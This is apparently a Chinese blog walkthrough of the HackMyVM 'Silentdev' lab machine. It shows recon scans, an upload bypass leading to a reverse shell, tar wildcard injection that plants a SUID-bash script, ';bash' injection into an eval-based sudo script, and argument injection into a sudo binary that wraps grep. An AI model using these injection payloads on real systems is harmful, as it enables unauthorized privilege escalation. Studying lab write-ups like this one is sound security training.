跳过正文
HYH’s Blog

HackMyVM-Silentdev

·560 字·3 分钟
Hackmyvm Hackmyvm Linux
HYH
作者
HYH
一名专注于网络安全、渗透测试与 CTF 挑战的技术爱好者,热衷于记录实战经验、分享工具与技术,致力于持续学习与成长。
目录

Nmap
# 

[root@Hacking] /home/kali/silentdev  
❯ nmap 192.168.26.18 -A -p-                                                                      

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey: 
|   256 4a:f7:09:40:45:df:25:cc:a4:f5:85:ac:63:c6:13:3e (ECDSA)
|_  256 58:be:2c:d0:40:af:d5:9c:2a:13:38:82:61:f6:8c:87 (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Upload Image
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:3A:A8:70 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

进入之后是一个上传页面

Feroxbuster
# 

[root@Hacking] /home/kali/silentdev  
❯ feroxbuster -u 'http://192.168.26.18/' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php                           ⏎
                                                                                                                                                
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.26.18/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [txt, php]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        9l       31w      275c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        9l       28w      278c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET        1l        5w       29c http://192.168.26.18/upload.php
301      GET        9l       28w      316c http://192.168.26.18/uploads => http://192.168.26.18/uploads/
200      GET      361l     2489w   217155c http://192.168.26.18/uploads/cat.jpg
200      GET       70l      139w     1602c http://192.168.26.18/
200      GET     5824l    31652w  2215731c http://192.168.26.18/uploads/dog.jpeg
[####################] - 60s   661656/661656  0s      found:5       errors:0      
[####################] - 60s   661638/661638  11053/s http://192.168.26.18/ 
[####################] - 1s    661638/661638  926664/s http://192.168.26.18/uploads/ => Directory listing (add --scan-dir-listings to scan)

Upload
#

上传部分只需要用一张真的图片,然后修改Content-Type,插入php代码即可,后缀名没有过滤。

然后即可反弹shell

Own developer
#

上传pspy监听,发现存在定时任务

同时/opt/project目录是www-data可以写入的

www-data@silentdev:/opt$ ls -al
total 12
drwxr-xr-x  3 root      root       4096 Apr 19 11:08 .
drwxr-xr-x 18 root      root       4096 Apr 19 10:00 ..
drwxrwx---  2 developer developers 4096 Sep  5 08:31 project
www-data@silentdev:/opt$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data),1004(developers)

因此利用点就在tar后面的通配符,tar在打包时如果目录里有特定文件名,可能会被解释成参数,从而执行命令。

echo 'chmod +s /bin/bash' > shell.sh
chmod +x shell.sh
echo '' > '--checkpoint=1'
echo '' > '--checkpoint-action=exec=sh shell.sh'

等待任务执行

即可获得developer的权限,写入ssh密钥连接。

Own alfonso
#

查看sudo

$ sudo -l
Matching Defaults entries for developer on silentdev:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User developer may run the following commands on silentdev:
    (alfonso) NOPASSWD: /usr/bin/sysinfo.sh
$ cat /usr/bin/sysinfo.sh
#!/bin/bash

echo "Hello $USER, checking system status."

echo "Choose an option:"
echo "1. Disk usage (df)"
echo "2. Running processes (ps)"
echo "3. Exit"

read -p "Enter option (1-3): " opt

case "$opt" in
        1) action="df" ;;
        2) action="ps" ;;
        3) echo "Goodbye!"; exit ;;
        *) action="echo Invalid option" ;;
esac

read -p "Any additional options?: " extra

eval "$action $extra"

发现最后几行有注入点,在第一次讯问后,会额外加一个选项,然后给eval运行。这时候只需要如下操作即可注入命令

sudo -u alfonso /usr/bin/sysinfo.sh
Enter option (1-3): 1
Any additional options?: ;bash

Root
#

查看sudo

alfonso@silentdev:~$ sudo -l
Matching Defaults entries for alfonso on silentdev:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User alfonso may run the following commands on silentdev:
    (ALL) NOPASSWD: /usr/bin/silentgets
    
alfonso@silentdev:~$ sudo /usr/bin/silentgets 
Enter the username: root
root:x:0:0:root:/root:/bin/bash

alfonso@silentdev:~$ file /usr/bin/silentgets 
/usr/bin/silentgets: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, BuildID[sha1]=faab9c84241c2cd5503077cc1bda8f05e0c81930, for GNU/Linux 3.2.0, with debug_info, not stripped

将其复制出来,给IDA查看源码

看起来似乎是输入的字符串用于寻找/etc/passwd,如果输入的是恶意字符串,逃逸参数,那么可以实现命令执行。类似于下面思路

grep 'root' /etc/passwd;bash;cat /etcpasswd

其中输入的参数是

'root' /etc/passwd;bash;cat

Reply by Email